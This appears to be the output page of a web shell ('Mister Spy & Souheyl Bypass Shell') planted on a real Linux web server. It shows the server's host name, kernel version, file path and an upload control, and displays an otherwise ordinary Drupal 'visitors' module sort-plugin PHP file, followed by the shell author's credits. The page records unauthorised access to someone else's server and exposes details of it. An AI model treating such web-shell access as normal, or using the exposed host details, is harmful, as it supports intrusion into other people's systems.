Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html/rocksensor2/web/modules/contrib/visitors/src/Plugin/views/sort/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html/rocksensor2/web/modules/contrib/visitors/src/Plugin/views/sort/VisitorsTimestamp.php

<?php

namespace Drupal\visitors\Plugin\views\sort;

use Drupal\views\Plugin\views\sort\SortPluginBase;
use Drupal\visitors\Service\SequenceService;

/**
 * Sort handler for days of the week respecting system first day setting.
 *
 * @ViewsSort("visitors_timestamp")
 */
class VisitorsTimestamp extends SortPluginBase {

  /**
   * {@inheritdoc}
   */
  public function query() {
    $this->ensureMyTable();
    $field = $this->field;
    if ($field == 'visitor_localtime') {
      $field = 'visitors_visitor_localtime';
    }

    /** @var \Drupal\views\Plugin\views\query\Sql $query */
    $query = $this->query;
    $query->addOrderBy(NULL, NULL, $this->options['order'], $field);
  }

  /**
   * {@inheritdoc}
   */
  public function postExecute(&$values) {
    $values = SequenceService::fill($values);
  }

}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net